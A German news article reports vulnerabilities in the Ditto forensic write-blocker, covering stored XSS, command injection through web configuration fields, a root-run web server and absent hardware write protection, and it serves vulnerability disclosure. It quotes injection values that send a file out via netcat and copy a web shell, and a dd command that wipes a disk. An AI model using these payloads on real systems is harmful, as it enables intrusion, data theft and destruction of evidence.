Kritische Sicherheitslücken in Write-Blocker entdeckt

Gleich mehrere Sicherheitslücken entdeckte ein IT-Forensik-Experte in dem neuen Write-Blocker Ditto. Die Folge: Statt seine eigentliche Arbeit zu verrichten, kann das Gerät selbst als Angriffswerkzeug missbraucht werden und Untersuchungen torpedieren.

In Pocket speichern vorlesen Druckansicht 48 Kommentare lesen
Lesezeit: 4 Min.
Von
  • Ute Roos

Der IT-Forensikexperte Martin Wundram von DigiTrace hat im neuen Write-Blocker "Ditto Forensic FieldStation" von CRU Wiebetech mehrere kritische Schwachstellen entdeckt. In der aktuellen Version hat dieser Write-Blocker demnach gar keine speziellen Techniken für den Schreibschutz implementiert. Darüber hinaus lässt sich das Gerät trojanisieren und für Angriffe missbrauchen.

Um für kriminaltechnische Ermittlungen forensisch exakte 1:1-Kopien von Datenträgern zu erstellen und dabei mit größtmöglicher Gewissheit eine versehentliche Manipulation der Quelldaten auszuschließen, verwenden IT-Forensiker sogenannte Write-Blocker. Die aktuelle Generation dieser Geräte beschränkt sich nicht mehr auf das Unterdrücken unerwünschter Schreibbefehle auf Quellfestplatten oder Quell-USB-Speichern, sondern bieten darüber hinaus als automatische Kopierstationen die komfortable Möglichkeit, Zielfestplatten direkt anzuschließen und geführt über ein eingebautes Menü oder eine Weboberfläche direkt Abbilder oder Klonkopien auf die angeschlossenen Festplatten zu schreiben. Einige dieser Geräte verfügen sogar über Netzwerkports und erlauben es, darüber schreibgeschützt Kopien von Daten in Netzwerkfreigaben zu erzeugen. Damit arbeiten diese Geräte nicht mehr isoliert, sondern sind für den Einsatz in potenziell gefährlichen, verdächtigen Netzwerken konzipiert. So auch der Write-Blocker Ditto.

Cross-Site-Scripting-Schwachstellen (XSS) im internen Bereich der Weboberfläche sind meist weniger kritisch einzustufen. Da der Write-Blocker über die Source-LAN-Schnittstelle an potenziell gefährliche Netzwerke angeschlossen werden kann und die administrative Weboberfläche dann auch über die Quell-IP-Adresse erreichbar ist, wird der Ditto zu einer angreifbaren Webanwendung. Über die von Martin Wundram entdeckten XSS-Lücken können Angreifer sogar ohne Kenntnis einer gültigen Benutzerkennung Schadcode in die Oberfläche einfügen, der anschließend dauerhaft alle Benutzer des Systems angreift. Diese kritische Schwachstelle ist im Detail in der CVE-Datenbank beschrieben (CVE-2013-6882).

Sehr kritisch ist ebenfalls eine weitere Schwachstelle. Der Ditto verfügt in seiner ursprünglichen Firmware-Version über einen aktiven SSH-Server, Benutzerkonten sind jedoch deaktiviert, so dass ein Login nicht möglich ist. Durch geschicktes Einfügen von Shell-Befehlen in Konfigurationsparameter innerhalb der Weboberfläche kann ein krimineller Benutzer jedoch leicht die vollständige Kontrolle über das embedded Linux-System übernehmen (etwa durch Einfügen eines manipulierten Parameters zur Sektorgröße: 1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666; -- oder 1;cp /ditto/shell.php /opt/web/htdocs;). Wundram fand heraus, dass der Webserver Lighthttpd in diesem Gerät mit vollen Root-Rechten betrieben wird, und nicht, wie in solchen Fällen zwingend erforderlich, mit eingeschränkten Rechten. In der Folge lässt sich so eine Web-Shell kopieren, der SSH-Login aktivieren und voller Root-Zugriff auf das System erlangen.

Eine weitere Untersuchung zeigte, dass der Write-Blocker bisher keine speziellen Write-Blocking-Techniken in Hardware implementiert. So konnte Wundram beliebige angeschlossene Quellmedien überschreiben (dd if=/dev/zero of=/dev/sda). Lediglich die Weboberfläche bietet einem Benutzer nicht die Option, Quelldaten (versehentlich) zu überschreiben. Jede Fehlfunktion in der Weboberfläche oder dem embedded Linux kann aber potenziell dazu führen, dass Beweisdaten überschrieben und so unbrauchbar gemacht werden. Erstaunlich ist auch, dass das embedded Linux - obwohl es lediglich als Write-Blocker fungieren soll - etliche Werkzeuge wie den Texteditor vi oder das Netzwerktool netcat enthält und damit Angriffsversuche noch weiter erleichtert.

Im Fall des Ditto sind die gefundenen Schwachstellen deshalb so kritisch, weil eine mögliche Kompromittierung für einen normalen Anwender kaum feststellbar ist. So verlassen sich IT-Forensiker üblicherweise auf das Funktionieren ihrer Hardware und gehen nicht davon aus, dass Write-Blocker trojanisiert sein könnten und Beweise nicht sichern, sondern im Interesse der Gegenseite einfach vernichten.

Der bereits im April dieses Jahres informierte Hersteller hat mit zwei Firmware-Versionen von Juni 2013 und Oktober 2013 einige der Probleme mittlerweile behoben, andere Sicherheitslücken bestehen weiterhin. (ur)